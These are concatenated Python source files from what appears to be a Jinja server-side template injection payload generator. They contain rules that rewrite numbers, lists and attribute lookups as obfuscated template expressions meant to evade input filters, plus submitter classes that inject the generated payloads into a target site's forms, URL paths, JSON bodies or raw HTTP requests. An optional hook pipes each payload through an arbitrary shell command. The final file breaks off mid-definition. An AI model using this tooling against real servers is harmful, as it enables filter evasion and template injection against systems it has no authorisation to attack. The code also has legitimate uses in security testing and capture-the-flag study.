import math

# pylint: disable=wildcard-import,unused-wildcard-import,missing-function-docstring,unused-argument

from ..payload_gen import expression_gen, precedence
from ..rules_utils import (
    transform_int_chars_unicode,
    join_target,
    targets_from_pattern,
    literal_to_target,
)
from ..rules_types import *
from ..const import *
from ..context_vars import const_exprs, const_exprs_py3

const_exprs_all = {
    k: v
    for d in [const_exprs, const_exprs_py3]
    for k, v in d.items()
    if isinstance(v, int)
}


# ---


@expression_gen
def gen_multiply_normal(context: dict, a, b):
    a = (ENCLOSE_UNDER, precedence["multiply"], a)
    b = (ENCLOSE_UNDER, precedence["multiply"], b)
    return [(EXPRESSION, precedence["multiply"], [a, (LITERAL, "*"), b])]


@expression_gen
def gen_multiply_func(context: dict, a, b):
    return [
        (
            EXPRESSION,
            precedence["function_call"],
            [
                (ENCLOSE_UNDER, precedence["attribute"], a),
                (LITERAL, ".__mul__"),
                (
                    WRAP,
                    [
                        b,
                    ],
                ),
            ],
        )
    ]


@expression_gen
def gen_multiply_func2(context: dict, a, b):
    mul_func = (
        ONEOF,
        [
            [(LITERAL, "|attr('__mul__')")],
            [(LITERAL, '|attr("__mul__")')],
            [(LITERAL, "|attr"), (WRAP, [(VARIABLE_OF, "__mul__")])],
        ],
    )
    return [
        (
            EXPRESSION,
            precedence["called_filter"],
            [
                (ENCLOSE_UNDER, precedence["plain_filter"], a),
                mul_func,
                (
                    WRAP,
                    [
                        b,
                    ],
                ),
            ],
        )
    ]


# ---


@expression_gen
def gen_formular_sum_simplesum(context, num_targets):
    # simply sum up with `+` without touching complex rules for PLUS
    target_list = join_target(sep=(LITERAL, "+"), targets=num_targets)
    return [(EXPRESSION, precedence["plus"], target_list)]


@expression_gen
def gen_formular_sum_tuplesum(context, num_targets):
    if len(num_targets) == 1:
        return [num_targets[0]]
    target_list = (
        [
            (LITERAL, "("),
        ]
        + join_target(sep=(LITERAL, ","), targets=num_targets)
        + [(LITERAL, ")|sum")]
    )
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_formular_sum_add(context, num_targets):
    final_target = num_targets[0]
    for target in num_targets[1:]:
        final_target = (PLUS, final_target, target)
    return [final_target]


# ---


@expression_gen
def gen_zero_literal(context: dict):
    return [(EXPRESSION, precedence["literal"], [(LITERAL, "0")])]


@expression_gen
def gen_zero_2(context: dict):
    return [(EXPRESSION, precedence["plain_filter"], [(LITERAL, "{}|int")])]


@expression_gen
def gen_zero_3(context: dict):
    return [
        (
            EXPRESSION,
            precedence["plain_filter"],
            [(LITERAL, "g|urlencode|length"), (REQUIRE_FLASK,)],
        )
    ]


@expression_gen
def gen_zero_4(context: dict):
    return [(EXPRESSION, precedence["plain_filter"], [(LITERAL, "{}|urlencode|count")])]


@expression_gen
def gen_zero_cycler(context: dict):
    return [(EXPRESSION, precedence["attribute"], [(LITERAL, "cycler(cycler).pos")])]


@expression_gen
def gen_zero_cycler2(context: dict):
    targets = [
        (LITERAL, "cycler(cycler)["),
        (
            ONEOF,
            [
                [(LITERAL, "'pos'")],
                [(LITERAL, '"pos"')],
                [(VARIABLE_OF, "pos")],
            ],
        ),
        (LITERAL, "]"),
    ]
    return [(EXPRESSION, precedence["item"], targets)]


@expression_gen
def gen_zero_emptylength(context: dict):
    empty_things = [
        [(LITERAL, "''")],
        [(LITERAL, '""')],
        [(LITERAL, "()")],
        [(LITERAL, "( )")],
        [(LITERAL, "(\t)")],
        [(LITERAL, "(\n)")],
        [(LITERAL, "[]")],
        [(LITERAL, "{}")],
    ]
    get_length = [
        [(LITERAL, ".__len__()")],
        [(LITERAL, ".__len__( )")],
        [(LITERAL, ".__len__(\t)")],
        [(LITERAL, ".__len__(\n)")],
    ]
    target_list = [(ONEOF, empty_things), (ONEOF, get_length)]
    return [(EXPRESSION, precedence["function_call"], target_list)]


def gen_zero_const_expr(context):
    alternatives = [
        [literal_to_target(k)] for k, (v, _) in const_exprs.items() if v == 0
    ] + [
        [literal_to_target(k), (REQUIRE_PYTHON3,)]
        for k, (v, _) in const_exprs_py3.items()
        if v == 0
    ]
    if not alternatives:
        return [(UNSATISFIED,)]
    return [(ONEOF, alternatives)]


# ---


@expression_gen
def gen_positive_integer_simple(context: dict, value: int):
    if value < 0:
        return [(UNSATISFIED,)]
    return [(EXPRESSION, precedence["literal"], [(LITERAL, str(value))])]


@expression_gen
def gen_positive_integer_hex(context: dict, value: int):
    if value < 0:
        return [(UNSATISFIED,)]
    return [(EXPRESSION, precedence["literal"], [(LITERAL, hex(value))])]


@expression_gen
def gen_positive_integer_underline(context: dict, value: int):
    if value < 0:
        return [(UNSATISFIED,)]
    return [(EXPRESSION, precedence["literal"], [(LITERAL, "_".join(str(value)))])]


# jinja最新版的integer token正则如下：
# integer_re = re.compile(
#     r"""
#     (
#         0b(_?[0-1])+ # binary
#     |
#         0o(_?[0-7])+ # octal
#     |
#         0x(_?[\da-f])+ # hex    <--- 这个支持unicode
#     |
#         [1-9](_?\d)* # decimal    <--- 这个支持unicode
#     |
#         0(_?0)* # decimal zero
#     )
#     """,
#     re.IGNORECASE | re.VERBOSE,
# )


@expression_gen
def gen_positive_integer_unicode(context: dict, value: int):
    if value <= 9:
        return [(UNSATISFIED,)]
    payload_targets = [
        [(LITERAL, payload)] for payload in transform_int_chars_unicode(str(value)[1:])
    ]
    return [
        (REQUIRE_PYTHON3,),
        (
            EXPRESSION,
            precedence["literal"],
            [(LITERAL, str(value)[0]), (ONEOF, payload_targets)],
        ),
    ]


@expression_gen
def gen_positive_integer_unicodehex(context: dict, value: int):
    if value <= 0:
        return [(UNSATISFIED,)]
    value_hex_literal = hex(value)[2:]
    payload_targets = [
        [(LITERAL, payload)]
        for payload in transform_int_chars_unicode(value_hex_literal)
    ]
    targets_list = [(LITERAL, "0x"), (ONEOF, payload_targets)]
    return [(REQUIRE_PYTHON3,), (EXPRESSION, precedence["literal"], targets_list)]


@expression_gen
def gen_positive_integer_hexunderline(context: dict, value: int):
    if value < 0:
        return [(UNSATISFIED,)]
    digits = hex(value)[2:]
    literal = "0x_{}".format("_".join(digits))
    return [(EXPRESSION, precedence["literal"], [(LITERAL, literal)])]


@expression_gen
def gen_positive_integer_octunderline(context: dict, value: int):
    if value < 0:
        return [(UNSATISFIED,)]
    digits = oct(value)[2:]
    literal = "0o_{}".format("_".join(digits))
    return [(EXPRESSION, precedence["literal"], [(LITERAL, literal)])]


@expression_gen
def gen_positive_integer_recurmulitiply(context: dict, value: int):
    if value <= 20 or value > 1000:
        return [(UNSATISFIED,)]
    xs = [x for x in range(3, value // 2) if value % x == 0]
    xs.sort(key=lambda x: max(x, value // x))
    if xs == [] or value < 20:
        return [(UNSATISFIED,)]
    target_list = [
        (
            ONEOF,
            [
                [
                    (
                        MULTIPLY,
                        (POSITIVE_INTEGER, value // x),
                        (POSITIVE_INTEGER, x),
                    )
                ]
                for x in xs
            ],
        )
    ]
    return [(EXPRESSION, precedence["multiply"], target_list)]


@expression_gen
def gen_positive_integer_recurmultiply2(context: dict, value: int):
    if value <= 20 or value > 1000:
        return [(UNSATISFIED,)]
    alternatives = []
    for i in range(9, 3, -1):
        lst = [(LITERAL, "+"), (POSITIVE_INTEGER, value % i)] if value % i != 0 else []
        alternative = (
            [
                (LITERAL, "("),
                (ENCLOSE_UNDER, precedence["multiply"], (POSITIVE_INTEGER, value // i)),
                (LITERAL, "*"),
                (ENCLOSE_UNDER, precedence["multiply"], (POSITIVE_INTEGER, i)),
            ]
            + lst
            + [
                (LITERAL, ")"),
            ]
        )
        alternatives.append(alternative)
    if not alternatives:
        return [(UNSATISFIED,)]
    target_list = [(ONEOF, alternatives)]
    return [(EXPRESSION, precedence["plus"], target_list)]


@expression_gen
def gen_positive_integer_sum(context: dict, value: int):
    if value < 0 or value > 1000:
        return [(UNSATISFIED,)]

    ints = [
        {
            "expression": expression,
            "value": value,
            "precedence": precedence,
        }
        for expression, (value, precedence) in context.items()
        if isinstance(value, int) and value > 0
    ]

    if ints == []:
        return [(UNSATISFIED,)]

    ints.sort(key=lambda item: item["value"], reverse=True)
    value_left = value
    payload_vars = []
    while value_left != 0:
        while ints and ints[0]["value"] > value_left:
            ints = ints[1:]
        if not ints:
            return [(UNSATISFIED,)]
        value_left -= ints[0]["value"]
        payload_vars.append(ints[0])
    ints = [
        (EXPRESSION, item["precedence"], [(LITERAL, item["expression"])])
        for item in payload_vars
    ]
    return [(FORMULAR_SUM, ints)] + [
        (WITH_CONTEXT_VAR, item["expression"]) for item in payload_vars
    ]


@expression_gen
def gen_positive_integer_recurmulnoastral(context: dict, value: int):
    if value <= 20 or value > 1000:
        return [(UNSATISFIED,)]
    alternatives = []
    pieces_max = int(math.sqrt(value)) + 2
    for i in range(3, pieces_max):
        # value = a * i + b
        a, b = (value // i), (value % i)
        if a > pieces_max:
            continue
        if b == 0:

            alternative = [(MULTIPLY, (POSITIVE_INTEGER, a), (POSITIVE_INTEGER, i))]
            alternatives.insert(0, alternative)
        else:
            alternative = [
                (
                    PLUS,
                    (MULTIPLY, (POSITIVE_INTEGER, a), (POSITIVE_INTEGER, i)),
                    (POSITIVE_INTEGER, b),
                )
            ]
            alternatives.append(alternative)
    if not alternatives:
        return [(UNSATISFIED,)]
    return [(ONEOF, alternatives)]


@expression_gen
def gen_positive_integer_lengthything(context: dict, value: int):
    if value >= 10 or value <= 3:  # stop generating lengthy payload
        return [(UNSATISFIED,)]
    lengthy_thing: OneofTarget = (
        ONEOF,
        [
            [(LITERAL, "'{}'".format("n" * value))],
            [(LITERAL, '"{}"'.format("n" * value))],
            [(LITERAL, "dict({}=x)|join".format("n" * value))],
            [(LITERAL, "({})".format(",".join("n" * value)))],
            [(LITERAL, "cycler({}).items".format(",".join("n" * value)))],
        ],
    )
    target_list = [
        (
            ONEOF,
            [
                [lengthy_thing, (LITERAL, "|length")],
                [lengthy_thing, (LITERAL, "|count")],
                targets_from_pattern(
                    "(LENGTHY_THING,)|map(LENGTH_OR_COUNT)|GETTHAT",
                    {
                        "LENGTHY_THING": lengthy_thing,
                        "LENGTH_OR_COUNT": (
                            ONEOF,
                            [
                                [(LITERAL, "'le''ngth'")],
                                [(LITERAL, '"le""ngth"')],
                                [(LITERAL, "'co''unt'")],
                                [(LITERAL, '"co""unt"')],
                                [(VARIABLE_OF, "length")],
                                [(VARIABLE_OF, "count")],
                            ],
                        ),
                        "GETTHAT": (
                            ONEOF,
                            [[(LITERAL, "first")], [(LITERAL, "last")]],
                        ),
                    },
                ),
            ],
        )
    ]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_positive_integer_length(context: dict, value: int):
    if not (1 < value < 10):
        return [(UNSATISFIED,)]
    lengthy_tuples_zero = (
        [
            (LITERAL, "("),
        ]
        + join_target((LITERAL, ","), [(ZERO,) for _ in range(value)])
        + [
            (LITERAL, ")"),
        ]
    )
    lengthy_tuples_x = (
        [
            (LITERAL, "("),
        ]
        + [
            (
                ONEOF,
                [
                    join_target(
                        (LITERAL, ","), [(LITERAL, chr(c)) for _ in range(value)]
                    )
                    for c in range(ord("a"), ord("z") + 1)
                ],
            )
        ]
        + [
            (LITERAL, ")"),
        ]
    )
    target_list = [
        (ONEOF, [lengthy_tuples_x, lengthy_tuples_zero]),
        (
            ONEOF,
            [
                [(LITERAL, ".__len__()")],
                [(LITERAL, ".__len__( )")],
                [(LITERAL, ".__len__(\t)")],
                [(LITERAL, ".__len__(\n)")],
            ],
            # [(LITERAL, "|length")],
        ),
    ]
    return [
        (
            EXPRESSION,
            precedence["function_call"],
            target_list,
        )
    ]


@expression_gen
def gen_positive_integer_numbersum1(context: dict, value: int):
    if value < 5 or value > 1000:
        return [(UNSATISFIED,)]
    alternative = []
    for i in range(min(40, value - 1), 3, -1):
        if value % i != 0:
            numbers = [str(i)] * (value // i) + [str(value % i)]
        else:
            numbers = [str(i)] * (value // i)
        inner = "+".join(numbers)
        alternative.append([(LITERAL, inner)])
    target_list = [(ONEOF, alternative)]
    return [(EXPRESSION, precedence["plus"], target_list)]


@expression_gen
def gen_positive_integer_numbersum2(context: dict, value: int):
    if value < 5 or value > 1000:
        return [(UNSATISFIED,)]
    alternatives = []
    for i in range(min(40, value - 1), 3, -1):
        if value % i != 0:
            numbers = [str(i)] * (value // i) + [str(value % i)]
        else:
            numbers = [str(i)] * (value // i)
        inner = ",".join(numbers)
        alternatives.append([(LITERAL, "({})|sum".format(inner))])
    target_list = [(ONEOF, alternatives)]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_positive_integer_charint(context: dict, value: int):
    if value < 10:
        return [(UNSATISFIED,)]

    targets: List[Target] = [
        (
            EXPRESSION,
            precedence["plain_filter"],
            [
                (ENCLOSE_UNDER, precedence["plain_filter"], (INTEGER, int(x))),
                (LITERAL, "|e"),
            ],
        )
        for x in str(value)
    ]
    return [
        (
            EXPRESSION,
            precedence["plain_filter"],
            [
                (
                    WRAP,
                    join_target((LITERAL, "~"), targets),
                ),
                (LITERAL, "|int"),
            ],
        )
    ]


@expression_gen
def gen_positive_integer_count(context: dict, value: int):
    if value > 10:
        return [(UNSATISFIED,)]
    s = ",".join("x" * value)
    if value == 1:
        s += ","
    target_list = [(LITERAL, "({})|count".format(s))]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_positive_integer_strcount(context: dict, value: int):
    if not (3 <= value <= 9):
        return [(UNSATISFIED,)]
    length_str = "~".join("{}" for _ in range(value // 2))
    if value % 2 == 1:
        length_str += "~{}|int"
    targets = targets_from_pattern(
        f"({length_str})|count",
        {
            "{}": (
                ONEOF,
                [
                    [(LITERAL, "{}")],
                    [(LITERAL, "()")],
                    [(LITERAL, "{ }")],
                    [(LITERAL, "( )")],
                ],
            ),
            "count": (
                ONEOF,
                [
                    [(LITERAL, "count")],
                    [(LITERAL, "length")],
                ],
            ),
        },
    )
    return [(EXPRESSION, precedence["tilde"], targets)]


@expression_gen
def gen_positive_integer_onesum1(context: dict, value: int):
    if value > 10 or value < 2:
        return [(UNSATISFIED,)]
    target_list = [(LITERAL, "{}".format("+".join(["1"] * value)))]
    return [(EXPRESSION, precedence["plus"], target_list)]


@expression_gen
def gen_positive_integer_onesum2(context: dict, value: int):
    if value > 10 or value < 2:
        return [(UNSATISFIED,)]
    target_list = [(LITERAL, "({},)|sum".format(",".join(["1"] * value)))]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_positive_integer_truesum1(context: dict, value: int):
    if value > 10 or value < 2:
        return [(UNSATISFIED,)]
    target_list = [(LITERAL, "{}".format("+".join(["True"] * value)))]
    return [(EXPRESSION, precedence["plus"], target_list)]


@expression_gen
def gen_positive_integer_truesum2(context: dict, value: int):
    if value > 10 or value < 2:
        return [(UNSATISFIED,)]
    target_list = [(LITERAL, "({},)|sum".format(",".join(["True"] * value)))]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_positive_integer_bool(context: dict, value: int):
    if value not in (0, 1):
        return [(UNSATISFIED,)]

    target_list = [(LITERAL, f"{value == 1}+False")]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_positive_integer_constexpr(context: dict, value: int):

    alternatives = [
        [literal_to_target(k)] for k, (v, _) in const_exprs.items() if v == value
    ] + [
        [literal_to_target(k), (REQUIRE_PYTHON3,)]
        for k, (v, _) in const_exprs_py3.items()
        if v == value
    ]
    if not alternatives:
        return [(UNSATISFIED,)]
    return [(ONEOF, alternatives)]


@expression_gen
def gen_positive_integer_multiply1000(context: dict, value: int):
    if value <= 1000:
        return [(UNSATISFIED,)]
    return [
        (
            PLUS,
            (MULTIPLY, (INTEGER, value // 1000), (INTEGER, 1000)),
            (INTEGER, value % 1000),
        )
    ]


# ---


@expression_gen
def gen_integer_literal(context: dict, value: int):
    return [(EXPRESSION, precedence["literal"], [(LITERAL, str(value))])]


@expression_gen
def gen_integer_context(context: dict, value: int):
    return [(VARIABLE_OF, value)]


@expression_gen
def gen_integer_zero(context: dict, value: int):
    if value != 0:
        return [(UNSATISFIED,)]
    return [(ZERO,)]


@expression_gen
def gen_integer_positive(context: dict, value: int):
    if value <= 0:
        return [(UNSATISFIED,)]
    return [(POSITIVE_INTEGER, value)]


@expression_gen
def gen_integer_negative(context: dict, value: int):
    if value >= 0:
        return [(UNSATISFIED,)]
    target_list = [
        (LITERAL, "-"),
        (ENCLOSE_UNDER, precedence["subtract"], (POSITIVE_INTEGER, abs(value))),
    ]
    return [(EXPRESSION, precedence["subtract"], target_list)]



from typing import List
import logging

# pylint: disable=wildcard-import,unused-wildcard-import,missing-function-docstring,unused-argument,unused-imports

from ..payload_gen import expression_gen, precedence
from ..rules_utils import join_target, targets_from_pattern
from ..rules_types import Target
from ..const import *

logger = logging.getLogger("rules.list_ops")


@expression_gen
def gen_listify_normal(context, target):
    return [
        (LITERAL, "["),
        target,
        (LITERAL, "]"),
    ]


@expression_gen
def gen_listify_filter(context, target):
    return targets_from_pattern(
        "{1:OBJ}|items|list|map('last')|list",
        {"1": (INTEGER, 1), "OBJ": target, "'last'": (STRING, "last")},
    )


@expression_gen
def gen_listify_str(context, target):
    if target[0] != STRING:
        return [(UNSATISFIED)]
    return targets_from_pattern(
        "STR|slice(1)|map('join')|list",
        {
            "STR": (ENCLOSE_UNDER, precedence["plain_filter"], target),
            "1": (INTEGER, 1),
            "'join'": (STRING, "join"),
        },
    )


@expression_gen
def gen_listify_str2(context, target):
    if target[0] != STRING:
        return [(UNSATISFIED)]
    return targets_from_pattern(
        "STR|batch(LEN)|map('join')|list",
        {
            "STR": (ENCLOSE_UNDER, precedence["plain_filter"], target),
            "LEN": (INTEGER, len(target[1])),
            "'join'": (STRING, "join"),
        },
    )


@expression_gen
def gen_map_attr_normal(context, obj, name):
    targets = targets_from_pattern(
        "OBJ|map('attr','name')",
        {
            "OBJ": (ENCLOSE_UNDER, precedence["plain_filter"], obj),
            "'attr'": (STRING, "attr"),
            "'name'": (STRING, name),
        },
    )
    return [(EXPRESSION, precedence["called_filter"], targets)]


@expression_gen
def gen_map_attr_normal2(context, obj, name):
    targets = targets_from_pattern(
        "OBJ|map(attribute='name')",
        {"OBJ": (ENCLOSE_UNDER, precedence["plain_filter"], obj), "'name'": (STRING, name)},
    )
    return [(EXPRESSION, precedence["called_filter"], targets)]


@expression_gen
def gen_map_attr_dict(context, obj, name):
    targets = targets_from_pattern(
        "OBJ|map(**{'attribute':'name'})",
        {
            "OBJ": (ENCLOSE_UNDER, precedence["plain_filter"], obj),
            "'attribute'": (STRING, "attribute"),
            "'name'": (STRING, name),
        },
    )
    return [(EXPRESSION, precedence["called_filter"], targets)]



"""向某个表格或者路径发出payload的submitter"""

import logging
import subprocess
import html
import re

from contextlib import contextmanager
from pathlib import Path
from typing import List, Callable, Union, NamedTuple, Dict
from urllib.parse import quote

from rich.markup import escape as rich_escape

from .form import Form, fill_form
from .requester import HTTPRequester, TCPRequester
from .const import CALLBACK_SUBMIT

logger = logging.getLogger("submitter")


Tamperer = Callable[[str], str]


def shell_tamperer(shell_cmd: str) -> Tamperer:
    """返回一个新的shell tamperer

    Args:
        shell_cmd (str): 用于修改payload的命令

    Returns:
        Tamperer: 新的Tamperer
    """

    def tamperer(payload: str):
        proc = subprocess.Popen(
            shell_cmd,
            shell=True,
            stdout=subprocess.PIPE,
            stdin=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
        assert proc.stdin and proc.stdout
        proc.stdin.write(payload.encode())
        proc.stdin.close()
        ret = proc.wait()
        if ret != 0:
            raise ValueError(
                f"Shell command return non-zero code {ret} for input {payload}"
            )
        out = proc.stdout.read().decode()
        if out.endswith("\n"):
            logger.info(
                "Tamperer [blue]%s[/] output [blue]%s[/]"
                " ends with '\\n', it may cause some issues.",
                rich_escape(shell_cmd),
                rich_escape(out),
                extra={"markup": True, "highlighter": None},
            )
        return out

    return tamperer


def update_content_length(request: bytes) -> bytes:
    """更新请求体长度

    Args:
        request (bytes): 请求

    Returns:
        bytes: 更新结果
    """
    if request.startswith(b"GET") or request.startswith(b"HEAD"):
        return request
    header, _, body = request.rpartition(b"\r\n\r\n")
    if len(header) == 0:
        return request
    content_length = len(body)
    content_length_header = f"Content-Length: {content_length}".encode()
    result, replace_count = re.subn(
        b"Content-Length:.*", content_length_header, header, 0, re.IGNORECASE
    )
    if replace_count == 0:
        result += b"\r\n" + content_length_header
    return result + b"\r\n\r\n" + body


class HTTPResponse(NamedTuple):
    """解析后的HTTP响应

    Args:
        status_code: 返回值
        text: HTTP的正文
    """

    status_code: int
    text: str


class BaseSubmitter:
    """
    payload提交器，其会发送对应的payload，并获得相应页面的状态码与正文
    其支持增加tamperer, 在发送之前对payload进行编码
    """

    def __init__(self, callback=None):
        self.tamperers: List[Tamperer] = []
        self.callback: Callable[[str, Dict], None] = (
            callback if callback else (lambda x, y: None)
        )

    def add_tamperer(self, tamperer: Tamperer):
        """增加新的tamperer

        Args:
            tamperer (Tamperer): 新的tamperer
        """
        self.tamperers.append(tamperer)

    def submit_raw(self, raw_payload: str) -> Union[HTTPResponse, None]:
        """提交tamperer修改后的payload

        Args:
            raw_payload (str): payload

        Returns:
            Union[HTTPResponse, None]: payload提交结果
        """
        raise NotImplementedError()

    def submit(self, payload: str) -> Union[HTTPResponse, None]:
        """调用tamperer修改payload并提交

        Args:
            raw_payload (str): payload

        Returns:
            Union[HTTPResponse, None]: payload提交结果
        """
        if self.tamperers:
            logger.debug("Applying tampers...")
            for tamperer in self.tamperers:
                payload = tamperer(payload)
        logger.debug("Submit [blue]%s[/]", rich_escape(payload))
        resp = self.submit_raw(payload)
        if resp is None:
            return None
        return HTTPResponse(resp.status_code, html.unescape(resp.text))


class ExtraParamAndDataCustomizable:
    def set_extra_param(self, k: str, v: str):
        """设置需要提交的额外GET参数

        Args:
            k (str): 额外参数的键
            v (str): 额外参数的值
        """
        raise NotImplementedError()

    def unset_extra_param(self, k: str):
        """删除需要提交的额外GET参数

        Args:
            k (str): 额外参数的键
            v (str): 额外参数的值
        """
        raise NotImplementedError()


class TCPSubmitter(BaseSubmitter):
    """根据模板从TCP发送HTTP1.1请求的类"""

    def __init__(
        self,
        requester: TCPRequester,
        pattern: bytes,
        toreplace=b"PAYLOAD",
        urlencode_payload=True,
        tamperers: Union[List[Tamperer], None] = None,
        enable_update_content_length=True,
    ):

        super().__init__()
        self.pattern = pattern
        self.toreplace = toreplace
        self.urlencode_payload = urlencode_payload
        self.req = requester
        self.enable_update_content_length = enable_update_content_length
        if tamperers:
            for tamperer in tamperers:
                self.add_tamperer(tamperer)

    def submit_raw(self, raw_payload):
        if self.urlencode_payload:
            raw_payload = quote(raw_payload)
        request = self.pattern.replace(self.toreplace, raw_payload.encode())
        if self.enable_update_content_length:
            request = update_content_length(request)
        result = self.req.request(request)
        if result is None:
            return None
        code, text = result
        return HTTPResponse(code, text)


class RequestSubmitter(BaseSubmitter):
    """向一个url提交GET或POST数据"""

    def __init__(
        self,
        url: str,
        method: str,
        target_field: str,
        params: Union[Dict[str, str], None],
        data: Union[Dict[str, str], None],
        requester: HTTPRequester,
        tamperers: Union[List[Tamperer], None] = None,
    ):
        """传入目标的URL, method和提交的项

        Args:
            url (str): 目标URL
            method (str): 方法
            target_field (str): 目标项
            params (Union[Dict[str, str], None]): 目标GET参数
            data (Union[Dict[str, str], None]): 目标POST参数
        """
        super().__init__()
        self.url = url
        self.method = method
        self.target_field = target_field
        self.params = params if params else {}
        self.data = data if data else {}
        self.req = requester
        if tamperers:
            for tamperer in tamperers:
                self.add_tamperer(tamperer)

    def submit_raw(self, raw_payload):
        params, data = self.params.copy(), self.data.copy()
        if self.method == "POST":
            data.update({self.target_field: raw_payload})
        else:
            params.update({self.target_field: raw_payload})
        logger.info(
            "Submit [blue]%s method=%s params=%s data=%s[/]",
            rich_escape(self.url),
            self.method,
            rich_escape(repr(params)),
            rich_escape(repr(data)),
            extra={"markup": True, "highlighter": None},
        )

        return self.req.request(
            method=self.method, url=self.url, params=params, data=data
        )


class FormSubmitter(BaseSubmitter, ExtraParamAndDataCustomizable):
    """
    向一个表格的某一项提交payload, 其他项随机填充
    """

    def __init__(
        self,
        url: str,
        form: Form,
        target_field: str,
        requester: HTTPRequester,
        callback: Union[Callable[[str, Dict], None], None] = None,
        tamperers: Union[List[Tamperer], None] = None,
    ):
        """传入目标表格的url，form实例与目标表单项，以及用于提交HTTP请求的requester

        Args:
            url (str): 表格所在的url
            form (Form): 表格的实例
            target_field (str): 目标表单项
            requester (Requester): Requester实例，用于实际发送HTTP请求
        """
        super().__init__(callback)
        self.url = url
        self.form = form
        self.req = requester
        self.target_field = target_field
        self.extra_params = {}
        if tamperers:
            for tamperer in tamperers:
                self.add_tamperer(tamperer)

    def submit_raw(self, raw_payload: str) -> Union[HTTPResponse, None]:
        inputs = {self.target_field: raw_payload}
        resp = self.req.request(
            **fill_form(
                self.url,
                self.form,
                inputs,
                extra_params=self.extra_params,
            )
        )
        self.callback(
            CALLBACK_SUBMIT,
            {
                "type": "form",
                "form": self.form,
                "inputs": inputs,
                "response": resp,
            },
        )
        if resp is None:
            return None
        return HTTPResponse(resp.status_code, resp.text)

    def set_extra_param(self, k: str, v: str):
        self.extra_params[k] = v

    def unset_extra_param(self, k: str):
        del self.extra_params[k]


class PathSubmitter(BaseSubmitter, ExtraParamAndDataCustomizable):
    """将payload进行url编码后拼接在某个url的后面并提交，看见..和/时拒绝提交"""

    def __init__(
        self,
        url: str,
        requester: HTTPRequester,
        callback: Union[Callable[[str, Dict], None], None] = None,
        tamperers: Union[List[Tamperer], None] = None,
    ):
        """传入目标URL和发送请求的Requester

        Args:
            url (str): 目标URL
            requester (Requester): Requester实例
        """
        super().__init__(callback)
        if not url.endswith("/"):
            logger.warning(
                "PathSubmitter get a url that's not ends with '/', appending it.",
                extra={"highlighter": None},
            )
            url += "/"
        self.url = url
        self.req = requester
        self.extra_params = {}
        if tamperers:
            for tamperer in tamperers:
                self.add_tamperer(tamperer)

    def submit_raw(self, raw_payload: str) -> Union[HTTPResponse, None]:
        # python requests would reencode url, resulting in payload being changed
        # that's why we're avoiding spaces and '%'
        if any(w in raw_payload for w in ["/", "..", " ", "%"]):
            logger.info(
                "Don't submit [yellow]%s[/] because it can't be in the path.",
                rich_escape(repr(raw_payload)),
                extra={"markup": True, "highlighter": None},
            )
            return None
        resp = self.req.request(
            method="GET", url=self.url + quote(raw_payload), params=self.extra_params
        )
        self.callback(
            CALLBACK_SUBMIT,
            {
                "type": "path",
                "url": self.url,
                "payload": raw_payload,
                "response": resp,
            },
        )
        if resp is None:
            return None
        return HTTPResponse(resp.status_code, resp.text)

    def set_extra_param(self, k: str, v: str):
        self.extra_params[k] = v

    def unset_extra_param(self, k: str):
        del self.extra_params[k]


class JsonSubmitter(BaseSubmitter, ExtraParamAndDataCustomizable):
    """将payload放在如{"name": "xiaoming", "age": 18}这样的JSON中提交"""

    def __init__(
        self,
        url: str,
        method: str,
        json_obj: dict,
        key: str,
        requester: HTTPRequester,
        callback: Union[Callable[[str, Dict], None], None] = None,
        tamperers: Union[List[Tamperer], None] = None,
    ):
        super().__init__(callback)
        self.url = url
        self.method = method
        self.json_obj = json_obj
        self.key = key
        self.req = requester
        self.extra_params = {}
        if tamperers:
            for tamperer in tamperers:
                self.add_tamperer(tamperer)

    def submit_raw(self, raw_payload: str) -> Union[HTTPResponse, None]:
        json_data = {**self.json_obj, self.key: raw_payload}
        resp = self.req.request(
            method=self.method, url=self.url, params=self.extra_params, json=json_data
        )
        if resp is None:
            return None
        return HTTPResponse(resp.status_code, resp.text)

    def set_extra_param(self, k: str, v: str):
        self.extra_params[k] = v

    def unset_extra_param(self, k: str):
        del self.extra_params[k]


# TODO: remove me
class IOSubmitter(BaseSubmitter):
    """将payload保存在本地文件中"""

    def __init__(self, path: Union[Path, None]):
        super().__init__(callback=None)
        self.path = path
        self.is_do_saving = True

    @contextmanager
    def stop_saving(self):
        self.is_do_saving = False
        yield
        self.is_do_saving = True

    def submit_raw(self, raw_payload: str) -> Union[HTTPResponse, None]:
        """假提交函数，作用是将payload保存在文件中，返回的HTTPResponse是假的

        Args:
            raw_payload (str): _description_

        Returns:
            Union[HTTPResponse, None]: _description_
        """
        if self.is_do_saving and isinstance(self.path, Path):
            try:
                self.path.write_text(raw_payload)
            except IOError as e:
                logger.error(
                    "[red bold]Failed to save file[/] [blue]%s[/]",
                    rich_escape(self.path.as_posix()),
                    extra={"markup": True, "highlighter": None},
                )
                raise e
            logger.info(
                "Saved to file [blue]%s[/]",
                rich_escape(self.path.as_posix()),
                extra={"markup": True, "highlighter": None},
            )
        elif self.is_do_saving:
            print(raw_payload)
        return HTTPResponse(250, raw_payload)


Submitter = BaseSubmitter



from typing import (
    List,
    Dict,
    Union,
)
import re

from .const import *
from .rules_types import Target

# precedence of filter:
# a|xxx()()
#  2   1 3
# 1: filter call
# 2: filter
# 3: function call
# `|xxx`: plain_filter
# `|xxx()`: called_filter

precedence_lst = [
    ["enclose", "literal", "flask_context_var", "jinja_context_var"],
    [
        "attribute",
        "item",
        "slide",
    ],
    [
        # xxx.a[b], xxx(a)[b] and xxx.a(b) works,
        # xxx|a(b)(c) works
        # but xxx|a[b] and xxx|a(yyy)[b] don't
        "function_call",
        "called_filter",
    ],
    ["plain_filter"],
    [
        "power",
    ],
    ["positive", "negative", "bitwise_not"],
    [
        "multiply",
        "matrix_multiply",
        "divide",  # '/'
        "true_divide",  # '//'
        "mod",
    ],
    [
        "plus",
        "subtract",
    ],
    [
        "tilde"
        # 1.0<2~"3" -> '<' not supported between instances of 'float' and 'str'
        # 1.0+2~"3" -> unsupported operand type(s) for +: 'float' and 'str'
    ],
    [
        "comparison",  # <= >= etc.
    ],
    [
